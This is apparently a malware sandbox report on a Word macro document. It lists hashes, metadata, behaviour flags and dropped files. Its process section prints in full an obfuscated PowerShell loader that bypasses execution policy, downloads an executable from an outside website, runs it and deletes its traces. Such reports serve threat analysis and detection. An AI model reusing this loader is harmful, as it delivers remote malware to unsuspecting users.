analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

e32940c52aed3b787267f4b8d528af97108b46f5254578cbaab20768d98f589e

Full analysis: https://app.any.run/tasks/03008759-02d7-454c-8611-acf7199b1cd8
Verdict: Malicious activity
Analysis date: July 18, 2019, 07:25:44
OS: Windows 7 Professional Service Pack 1 (build: 7601, 64 bit)
Tags:
generated-doc
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 5.1, Name of Creating Application: Microsoft Office Word, Author: Eduard Schuchhardt B.A., Number of Characters: 2331, Create Time/Date: Tue Oct 2 00:48:18 2018, Last Saved Time/Date: Tue Oct 2 00:48:18 2018, Security: 0, Keywords: voluptate, earum, enim, Last Saved By: Eduard Schuchhardt B.A., Revision Number: 181519, Subject: Dokument N892778, Template: Normal, Title: Dokument N892778, Total Editing Time: 02:00, Number of Words: 2331, Number of Pages: 64, Comments: Deserunt dolorem natus quae vel quia.
MD5:

B3B1760D2E5525A562F2D7A49C27ED93

SHA1:

94BE3E9B653FF9C2DB2FEA0A3FFB5F02E533D77E

SHA256:

E32940C52AED3B787267F4B8D528AF97108B46F5254578CBAAB20768D98F589E

SSDEEP:

3072:7AxB6T44CDZ803LyyK2CdWWDQKQ4k1aI2CyoPJf9J:7wN4Cl803eyK20WdKQ31vLyoPN9J

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Executable content was dropped or overwritten

      • WINWORD.EXE (PID: 2372)

    • Unusual execution from Microsoft Office

      • WINWORD.EXE (PID: 2372)

    • Application was dropped or rewritten from another process

      • VvoTw.exe (PID: 1784)

  • SUSPICIOUS

    • Reads the machine GUID from the registry

      • VvoTw.exe (PID: 1784)

  • INFO

    • Reads the machine GUID from the registry

      • WINWORD.EXE (PID: 2372)

    • Creates files in the user directory

      • WINWORD.EXE (PID: 2372)

    • Dropped object may contain Bitcoin addresses

      • WINWORD.EXE (PID: 2372)

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 2372)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (33.9)

EXIF

FlashPix

Category: sunt
Manager: Hertha Scholtz B.A.
Company: Junck Matthäi OHG mbH
Slides: -2147483648
Notes: -2147483648
Lines: 6422
HiddenSlides: -2147483648
Bytes: -2147483648
Paragraphs: 191
Comments: Deserunt dolorem natus quae vel quia.
Pages: 64
Words: 2331
TotalEditTime: 2.0 minutes
Title: Dokument N892778
Template: Normal
Subject: Dokument N892778
RevisionNumber: 181519
LastModifiedBy: Eduard Schuchhardt B.A.
Keywords: voluptate, earum, enim
Security: None
ModifyDate: 2018:10:01 23:48:18
CreateDate: 2018:10:01 23:48:18
Characters: 2331
Author: Eduard Schuchhardt B.A.
Software: Microsoft Office Word
CompObjUserType: Microsoft Office Word 97-2003 Document
CompObjUserTypeLen: 39
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
35
Monitored processes
2
Malicious processes
1
Suspicious processes
0

Behavior graph

Click at the process to see the details
drop and start start winword.exe vvotw.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
2372"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\e32940c52aed3b787267f4b8d528af97108b46f5254578cbaab20768d98f589e.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.5123.5000
1784C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\VvoTw.exe $NUiEp='\ow';$SxAuE='Obj';$uoea='force';$oxeee='($e';$vktvli='.Net.W';$jbigseylw0='y + ';$XMUMZWE4='te -';$XOWTI='pass ';$ieffuo='(1)';$eujnrw5='://ww';$sqjzsjlo='Pol';$toui='om/wp';$iuhki='Fil';$DvwlNy=' Pro';$yzlursyw='Execu';$vhxkqtzjk='+ ''\yz';$aexny='stem';$qkjrow='rt-';$KeOoB='art-';$BxuPiij76=''',$pa';$xelz='nv:t';$cnuosq20='h;Remo';$EYSIU='.Dow';$oaehcu='var';$cwoiead76='hy =';$ielme='Sta';$wola='qhly''';$YUElsi='Proc';$zspsuor='$path=';$euiiorl68='esn';$FFQBUPABR='en/in';$cvykcpzwy='eak;}}';$tdkgbiwo=' Get';$oaxzoto='UForm';$oosdikmy='twent';$gtzcid='%s;';$jyveey='e'');(';$atgmjml11='d){br';$qifhdo='; St';$zkuoap='https';$ywoy='ect Sy';$ycgvtzzj='ypw.ex';$zfgabei41='ebc';$hekuk='lie';$pwuqyi0=';';$BjAtpWpb='$nhb';$OumXqq10='ess f7f81a39-5f63-5b42-9efd-1f13b5431005#39;;$uyue1='ge $h';$EOIOEU='te -';$yeokke6='Sleep';$tgszrqz35=' -m ';$dazfse='s; ';$ZvpDZkuu='emes/';$EPUJVH4='11.11';$aukeue='Get-Da';$ycsxtafm=' = ';$ilaeyfv='tem ';$kkothu67='urs';$eufejwy='c/file';$ieaee='nload';$noxqa='e(''';$uewtnqv='f($e';$qrcttykg='tco.c';$zgyghao4='yfifte';$IIoxta='emp+''';$avgqknlogc='ve-I';$jklcieo='rialpe';$EZLui='$nhbh';$kjnjv='temp ';$ozhnqi51='($env:';$kluyxdm61=') -rec';$ucmntu='u -';$UuixWPz='e -';$ortdi=' $hva';$wbarkee40='{ $eu';$iuke='ces';$ukselzjd='-con';$acvasle='th)';$bovzcrf0='at ';$REPUUO='at ';$ycgjbp='pat';$qkmccflw='UForm';$qmroaxh='-Scope';$imcix='[do';$hxedwra='Set-';$muozz='tion';$flourh8=';while';$psae='/th';$xqkiobs='rd = ';$kvzxuue6='nt)';$cxlqiai='uble]';$GaUKeu0='535;i';$YFEegck='w.impe';$yuongdb='.exe';$feywlof='-Da';$bnnpujs='New-';$ogyvr='tent';$uuao8='icy By';$lyuzvkta='%s;'; Invoke-Expression ($imcix+$cxlqiai+$BjAtpWpb+$cwoiead76+$tdkgbiwo+$feywlof+$EOIOEU+$oaxzoto+$bovzcrf0+$lyuzvkta+$ortdi+$xqkiobs+$EZLui+$jbigseylw0+$EPUJVH4+$flourh8+$ieffuo+$wbarkee40+$ycsxtafm+$aukeue+$XMUMZWE4+$qkmccflw+$REPUUO+$gtzcid+$ielme+$qkjrow+$yeokke6+$tgszrqz35+$GaUKeu0+$uewtnqv+$ucmntu+$uyue1+$oaehcu+$atgmjml11+$cvykcpzwy+$hxedwra+$yzlursyw+$muozz+$sqjzsjlo+$uuao8+$XOWTI+$qmroaxh+$DvwlNy+$iuke+$dazfse+$zspsuor+$oxeee+$xelz+$IIoxta+$NUiEp+$euiiorl68+$ycgvtzzj+$jyveey+$bnnpujs+$SxAuE+$ywoy+$aexny+$vktvli+$zfgabei41+$hekuk+$kvzxuue6+$EYSIU+$ieaee+$iuhki+$noxqa+$zkuoap+$eujnrw5+$YFEegck+$jklcieo+$qrcttykg+$toui+$ukselzjd+$ogyvr+$psae+$ZvpDZkuu+$oosdikmy+$zgyghao4+$FFQBUPABR+$eufejwy+$yuongdb+$BxuPiij76+$acvasle+$qifhdo+$KeOoB+$YUElsi+$OumXqq10+$ycgjbp+$cnuosq20+$avgqknlogc+$ilaeyfv+$ozhnqi51+$kjnjv+$vhxkqtzjk+$wola+$kluyxdm61+$kkothu67+$UuixWPz+$uoea+$pwuqyi0);C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\VvoTw.exeWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
975
Read events
871
Write events
0
Delete events
0

Modification events

No data
Executable files
13
Suspicious files
0
Text files
123
Unknown types
3

Dropped files

PID
Process
Filename
Type
2372WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVRACCD.tmp.cvr
MD5:
SHA256:
2372WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.dattext
MD5:C602DFE9823E722F2F602F33A37CBB13
SHA256:B9F85015219CA33C2616875F9802DCEDE0301FBD50F4336F285FCB9712451DE2
2372WINWORD.EXEC:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\CompiledComposition.Microsoft.PowerShell.GPowerShell.dllexecutable
MD5:54EFE3C64894D8001451CFCADF9C0F3C
SHA256:52FBDDD19233ECC3F43CE229F6EA525C6775F435445E4811421195C40F8F569D
2372WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\e32940c52aed3b787267f4b8d528af97108b46f5254578cbaab20768d98f589e.doc.LNKlnk
MD5:1646F6F20D0CFC75416A644F97532017
SHA256:B32EBC7D5CF76DF0C0A167BEE162B7523FC4CF2FDDF30744486C5869F2072E60
2372WINWORD.EXEC:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\Diagnostics.Format.ps1xmltext
MD5:FF6EEB8125B9265C5BA40AF9F7C6F6BC
SHA256:7D569C1155CFA9B7BB2BA225EE409A55C8B0E8217F3A7E05BAA39DA1BD7C4689
2372WINWORD.EXEC:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\DotNetTypes.format.ps1xmlxml
MD5:1AB2FD4B6749AD6831C86411FDCAFB48
SHA256:98540086CFC986D7604FFDED977EF20944D1715BF8453809CE736C919CB6E1EF
2372WINWORD.EXEC:\Users\admin\Desktop\~$2940c52aed3b787267f4b8d528af97108b46f5254578cbaab20768d98f589e.docpgc
MD5:ADEB6243CB5FAD24CF9D150EC6AA3E0D
SHA256:0B567364B7EA4A3E8846D6D723ECE32DD8D14C1CF9893AF84900686D538FF0FB
2372WINWORD.EXEC:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\Certificate.format.ps1xmlxml
MD5:C93A361112351B30E2C959E72789952D
SHA256:4379BD59C1328A6811584D424DF3DC193A5D607E2859D3AC1655B9124A5F100D
2372WINWORD.EXEC:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\en-US\about_Command_Syntax.help.txttext
MD5:847B0C3A6010660492ECC1D88A69210D
SHA256:7D7EE4469AE76392317DC7E16E716B5767BD7EEFCDC39F60C51ED1DA2E99AE2B
2372WINWORD.EXEC:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\en-US\about_Comparison_Operators.help.txttext
MD5:409ED6BE5314BAC97AFC88ACA11725A8
SHA256:613EBA45D12113B49D942FF9CFC939F0F5C8CABB819B5B3BD47B7A4F9E719D48
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
0
TCP/UDP connections
0
DNS requests
0
Threats
0

HTTP requests

No HTTP requests
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

No data

DNS requests

No data

Threats

No threats detected
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2024 ANY.RUN LLC. ALL RIGHTS RESERVED
ANY.RUN
Reports
e32940c52aed3b787267f4b8d528af97108b46f5254578cbaab20768d98f589e